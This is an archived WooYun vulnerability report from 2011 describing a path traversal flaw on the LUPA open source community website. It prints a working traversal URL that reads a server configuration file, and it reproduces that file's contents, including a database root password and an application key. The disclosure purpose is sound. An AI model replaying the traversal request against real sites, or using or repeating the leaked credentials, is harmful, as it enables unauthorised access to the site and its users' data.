LUPA开源社区源码泄露 | wooyun-2011-02510| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2011-02510

漏洞标题：LUPA开源社区源码泄露

漏洞作者： t00000by57

提交时间：2011-07-16 13:26

修复时间：2011-07-18 00:46

公开时间：2011-07-18 00:46

漏洞类型：任意文件遍历/下载

危害等级：中

自评Rank：5

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2011-07-16：积极联系厂商并且等待厂商认领中，细节不对外公开
2011-07-18：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

我很无聊

详细说明：

http://www.lupaworld.com/code.php?mod=list&itemid=&path=/test&file=../../config/config_ucenter.php

漏洞证明：

1.   <?php
2.  
3.  
4.   define('UC_CONNECT', 'mysql');
5.  
6.   #define('UC_DBHOST', '192.168.1.10');
7.   define('UC_DBHOST', 'localhost');
8.   define('UC_DBUSER', 'root');
9.   define('UC_DBPW', '84636882');
10.   define('UC_DBNAME', 'lupa_www71');
11.   define('UC_DBCHARSET', 'utf8');
12.   define('UC_DBTABLEPRE', '`lupa_www71`.pre_ucenter_');
13.   define('UC_DBCONNECT', 0);
14.  
15.   define('UC_CHARSET', 'utf-8');
16.   define('UC_KEY', '1fG4v2c0Bdc94aM1Q8xcM4uac4M5I354ven4x0ecqcC7gef3v5c6fd86x1fey5p7');
17.   define('UC_API', 'http://www.lupaworld.com/uc_server');
18.   define('UC_APPID', '1');
19.   define('UC_IP', '127.0.0.1');
20.   define('UC_PPP', 20);
21.

修复方案：

basename

版权声明：转载请注明来源 t00000by57@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：5 (WooYun评价)

WooYun.org

漏洞概要 关注数(24) 关注此漏洞